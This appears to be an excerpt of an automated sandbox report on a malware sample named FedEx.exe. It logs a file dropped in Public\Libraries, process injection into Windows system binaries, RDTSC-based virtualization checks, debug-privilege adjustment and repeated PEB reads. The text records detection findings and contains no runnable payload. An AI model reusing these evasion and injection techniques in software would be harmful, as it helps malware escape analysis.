          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\logagent.exeRDTSC instruction interceptor: First address: 0000000010418C04 second address: 0000000010418C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exeRDTSC instruction interceptor: First address: 0000000010418F9E second address: 0000000010418FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 0000000010418C04 second address: 0000000010418C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\DpiScaling.exeRDTSC instruction interceptor: First address: 0000000010418F9E second address: 0000000010418FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000E28C04 second address: 0000000000E28C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000E28F9E second address: 0000000000E28FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000003048C04 second address: 0000000003048C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000003048F9E second address: 0000000003048FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000032D8C04 second address: 00000000032D8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000032D8F9E second address: 00000000032D8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F6DE6 rdtsc 8_2_051F6DE6
          Source: C:\Windows\SysWOW64\logagent.exeAPI coverage: 6.1 %
          Source: C:\Windows\SysWOW64\logagent.exeAPI coverage: 4.4 %
          Source: C:\Windows\SysWOW64\logagent.exeProcess information queried: ProcessInformationJump to behavior
          Source: FedEx.exe, 00000000.00000003.445267529.0000000000959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: FedEx.exe, 00000000.00000003.445267529.0000000000959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F6DE6 rdtsc 8_2_051F6DE6
          Source: C:\Windows\SysWOW64\logagent.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0523A537 mov eax, dword ptr fs:[00000030h]8_2_0523A537
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B9100 mov eax, dword ptr fs:[00000030h]8_2_051B9100
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B9100 mov eax, dword ptr fs:[00000030h]8_2_051B9100
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B9100 mov eax, dword ptr fs:[00000030h]8_2_051B9100
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05288D34 mov eax, dword ptr fs:[00000030h]8_2_05288D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527E539 mov eax, dword ptr fs:[00000030h]8_2_0527E539
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E513A mov eax, dword ptr fs:[00000030h]8_2_051E513A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E513A mov eax, dword ptr fs:[00000030h]8_2_051E513A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E4D3B mov eax, dword ptr fs:[00000030h]8_2_051E4D3B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E4D3B mov eax, dword ptr fs:[00000030h]8_2_051E4D3B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E4D3B mov eax, dword ptr fs:[00000030h]8_2_051E4D3B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C3D34 mov eax, dword ptr fs:[00000030h]8_2_051C3D34
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BAD30 mov eax, dword ptr fs:[00000030h]8_2_051BAD30
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D4120 mov eax, dword ptr fs:[00000030h]8_2_051D4120
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D4120 mov eax, dword ptr fs:[00000030h]8_2_051D4120
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D4120 mov eax, dword ptr fs:[00000030h]8_2_051D4120
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D4120 mov eax, dword ptr fs:[00000030h]8_2_051D4120
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D4120 mov ecx, dword ptr fs:[00000030h]8_2_051D4120
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D7D50 mov eax, dword ptr fs:[00000030h]8_2_051D7D50
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DB944 mov eax, dword ptr fs:[00000030h]8_2_051DB944
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DB944 mov eax, dword ptr fs:[00000030h]8_2_051DB944
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F3D43 mov eax, dword ptr fs:[00000030h]8_2_051F3D43
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05233540 mov eax, dword ptr fs:[00000030h]8_2_05233540
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BB171 mov eax, dword ptr fs:[00000030h]8_2_051BB171
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BB171 mov eax, dword ptr fs:[00000030h]8_2_051BB171
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DC577 mov eax, dword ptr fs:[00000030h]8_2_051DC577
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DC577 mov eax, dword ptr fs:[00000030h]8_2_051DC577
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BC962 mov eax, dword ptr fs:[00000030h]8_2_051BC962
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052805AC mov eax, dword ptr fs:[00000030h]8_2_052805AC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052805AC mov eax, dword ptr fs:[00000030h]8_2_052805AC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EFD9B mov eax, dword ptr fs:[00000030h]8_2_051EFD9B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EFD9B mov eax, dword ptr fs:[00000030h]8_2_051EFD9B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052369A6 mov eax, dword ptr fs:[00000030h]8_2_052369A6
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E2990 mov eax, dword ptr fs:[00000030h]8_2_051E2990
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]8_2_051B2D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]8_2_051B2D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]8_2_051B2D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]8_2_051B2D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]8_2_051B2D8A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EA185 mov eax, dword ptr fs:[00000030h]8_2_051EA185
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052351BE mov eax, dword ptr fs:[00000030h]8_2_052351BE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052351BE mov eax, dword ptr fs:[00000030h]8_2_052351BE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052351BE mov eax, dword ptr fs:[00000030h]8_2_052351BE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052351BE mov eax, dword ptr fs:[00000030h]8_2_052351BE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DC182 mov eax, dword ptr fs:[00000030h]8_2_051DC182
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E2581 mov eax, dword ptr fs:[00000030h]8_2_051E2581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E2581 mov eax, dword ptr fs:[00000030h]8_2_051E2581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E2581 mov eax, dword ptr fs:[00000030h]8_2_051E2581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E2581 mov eax, dword ptr fs:[00000030h]8_2_051E2581
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E1DB5 mov eax, dword ptr fs:[00000030h]8_2_051E1DB5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E1DB5 mov eax, dword ptr fs:[00000030h]8_2_051E1DB5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E1DB5 mov eax, dword ptr fs:[00000030h]8_2_051E1DB5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E61A0 mov eax, dword ptr fs:[00000030h]8_2_051E61A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E61A0 mov eax, dword ptr fs:[00000030h]8_2_051E61A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E35A1 mov eax, dword ptr fs:[00000030h]8_2_051E35A1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527FDE2 mov eax, dword ptr fs:[00000030h]8_2_0527FDE2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527FDE2 mov eax, dword ptr fs:[00000030h]8_2_0527FDE2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527FDE2 mov eax, dword ptr fs:[00000030h]8_2_0527FDE2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527FDE2 mov eax, dword ptr fs:[00000030h]8_2_0527FDE2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052441E8 mov eax, dword ptr fs:[00000030h]8_2_052441E8
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05268DF1 mov eax, dword ptr fs:[00000030h]8_2_05268DF1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]8_2_05236DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]8_2_05236DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]8_2_05236DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236DC9 mov ecx, dword ptr fs:[00000030h]8_2_05236DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]8_2_05236DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]8_2_05236DC9
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BB1E1 mov eax, dword ptr fs:[00000030h]8_2_051BB1E1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BB1E1 mov eax, dword ptr fs:[00000030h]8_2_051BB1E1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BB1E1 mov eax, dword ptr fs:[00000030h]8_2_051BB1E1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CD5E0 mov eax, dword ptr fs:[00000030h]8_2_051CD5E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CD5E0 mov eax, dword ptr fs:[00000030h]8_2_051CD5E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]8_2_05271C06
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0528740D mov eax, dword ptr fs:[00000030h]8_2_0528740D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0528740D mov eax, dword ptr fs:[00000030h]8_2_0528740D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0528740D mov eax, dword ptr fs:[00000030h]8_2_0528740D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236C0A mov eax, dword ptr fs:[00000030h]8_2_05236C0A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236C0A mov eax, dword ptr fs:[00000030h]8_2_05236C0A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236C0A mov eax, dword ptr fs:[00000030h]8_2_05236C0A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236C0A mov eax, dword ptr fs:[00000030h]8_2_05236C0A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EBC2C mov eax, dword ptr fs:[00000030h]8_2_051EBC2C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]8_2_051E002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]8_2_051E002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]8_2_051E002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]8_2_051E002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]8_2_051E002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05237016 mov eax, dword ptr fs:[00000030h]8_2_05237016
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05237016 mov eax, dword ptr fs:[00000030h]8_2_05237016
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05237016 mov eax, dword ptr fs:[00000030h]8_2_05237016
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CB02A mov eax, dword ptr fs:[00000030h]8_2_051CB02A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CB02A mov eax, dword ptr fs:[00000030h]8_2_051CB02A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CB02A mov eax, dword ptr fs:[00000030h]8_2_051CB02A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051CB02A mov eax, dword ptr fs:[00000030h]8_2_051CB02A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05284015 mov eax, dword ptr fs:[00000030h]8_2_05284015
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05284015 mov eax, dword ptr fs:[00000030h]8_2_05284015
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D0050 mov eax, dword ptr fs:[00000030h]8_2_051D0050
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D0050 mov eax, dword ptr fs:[00000030h]8_2_051D0050
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05272073 mov eax, dword ptr fs:[00000030h]8_2_05272073
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EA44B mov eax, dword ptr fs:[00000030h]8_2_051EA44B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05281074 mov eax, dword ptr fs:[00000030h]8_2_05281074
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051D746D mov eax, dword ptr fs:[00000030h]8_2_051D746D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524C450 mov eax, dword ptr fs:[00000030h]8_2_0524C450
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524C450 mov eax, dword ptr fs:[00000030h]8_2_0524C450
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051C849B mov eax, dword ptr fs:[00000030h]8_2_051C849B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B9080 mov eax, dword ptr fs:[00000030h]8_2_051B9080
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EF0BF mov ecx, dword ptr fs:[00000030h]8_2_051EF0BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EF0BF mov eax, dword ptr fs:[00000030h]8_2_051EF0BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EF0BF mov eax, dword ptr fs:[00000030h]8_2_051EF0BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05233884 mov eax, dword ptr fs:[00000030h]8_2_05233884
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05233884 mov eax, dword ptr fs:[00000030h]8_2_05233884
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F90AF mov eax, dword ptr fs:[00000030h]8_2_051F90AF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]8_2_051E20A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]8_2_051E20A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]8_2_051E20A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]8_2_051E20A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]8_2_051E20A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]8_2_051E20A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236CF0 mov eax, dword ptr fs:[00000030h]8_2_05236CF0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236CF0 mov eax, dword ptr fs:[00000030h]8_2_05236CF0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05236CF0 mov eax, dword ptr fs:[00000030h]8_2_05236CF0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_052714FB mov eax, dword ptr fs:[00000030h]8_2_052714FB
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]8_2_0524B8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524B8D0 mov ecx, dword ptr fs:[00000030h]8_2_0524B8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]8_2_0524B8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]8_2_0524B8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]8_2_0524B8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]8_2_0524B8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B58EC mov eax, dword ptr fs:[00000030h]8_2_051B58EC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05288CD6 mov eax, dword ptr fs:[00000030h]8_2_05288CD6
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051DF716 mov eax, dword ptr fs:[00000030h]8_2_051DF716
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EA70E mov eax, dword ptr fs:[00000030h]8_2_051EA70E
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EA70E mov eax, dword ptr fs:[00000030h]8_2_051EA70E
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0528070D mov eax, dword ptr fs:[00000030h]8_2_0528070D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0528070D mov eax, dword ptr fs:[00000030h]8_2_0528070D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051EE730 mov eax, dword ptr fs:[00000030h]8_2_051EE730
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524FF10 mov eax, dword ptr fs:[00000030h]8_2_0524FF10
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0524FF10 mov eax, dword ptr fs:[00000030h]8_2_0524FF10
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B4F2E mov eax, dword ptr fs:[00000030h]8_2_051B4F2E
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051B4F2E mov eax, dword ptr fs:[00000030h]8_2_051B4F2E
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_0527131B mov eax, dword ptr fs:[00000030h]8_2_0527131B
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_05288F6A mov eax, dword ptr fs:[00000030h]8_2_05288F6A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051BF358 mov eax, dword ptr fs:[00000030h]8_2_051BF358
